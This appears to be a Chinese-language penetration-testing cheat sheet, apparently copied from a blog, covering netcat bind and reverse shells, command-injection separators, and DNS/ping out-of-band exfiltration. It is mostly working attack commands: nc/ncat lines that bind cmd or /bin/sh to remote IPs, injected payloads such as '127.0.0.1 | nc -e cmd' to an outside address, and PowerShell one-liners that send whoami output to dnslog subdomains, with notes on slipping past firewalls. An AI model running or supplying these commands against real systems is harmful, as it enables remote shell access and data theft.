https://blog.csdn.net/weixin_43303273/article/details/83029138
命令生成:https://forum.ywhack.com/bountytips.php?download
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
命令生成:https://forum.ywhack.com/shell.php
NC(ncat)瑞士军刀:linux系统下自带,windows下需要下载。
//绑定CMD到本地5566端口
nc -e cmd -lvvp 5566
//主动连接目标5566
nc 10.10.10.1 5566
//绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 10.10.10.1 5566
//绑定CMD到目标5566端口
ncat -e /bin/sh x.x.x.x 5566 linux反弹windows上
//等待5566连接
nc -lvvp 5566
//绑定CMD到目标5566端口
nc -e cmd 10.10.10.146 5566 windows 反弹linux
//等待5566连接
ncat -lvvp 5566
管道符:| (管道符号 ) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && ``(特有``和;)
例子:
ping -c 1 127.0.0.1 ; whoami ping -c 1 127.0.0.1 | whoami ping -c 1 127.0.0.1 || whoami ping -c 1 127.0.0.1 & whoami ping -c 1 127.0.0.1 && whoami ping -c 1 127.0.0.1 `whoami`
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566
开启出站策略,采用正向连接
Linux:ncat -e cmd 47.122.23.131 5566
Windows:127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接
出站入站都开启策略(数据不回显):OSI网络七层
ping 127.0.0.1 | powershell x=whoami;x=x.Replace('\','xxx');y='5t4zre.dnslog.cn';z=x+y;ping z
漏洞有,但是数据不回显(开启了防火墙):
1、反弹shell
2、带外查询
为什么要这样写?
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行
powershell x=whoami;x=x.Replace('\','xxx');y='.vpod5d.dnslog.cn';z=x+y;ping z
127.0.0.1 | powershell x=ver;x=x.Replace('\','xxx');y='.vpod5d.dnslog.cn';z=x+y;ping z
ping命令走的ICMP协议,而防火墙禁用端口是控制TCP/UDP协议,也就是控制传输层,
但是ICMP是网络层,是传输层下层,不受防火墙影响。所以可以使用ping命令将数据带出。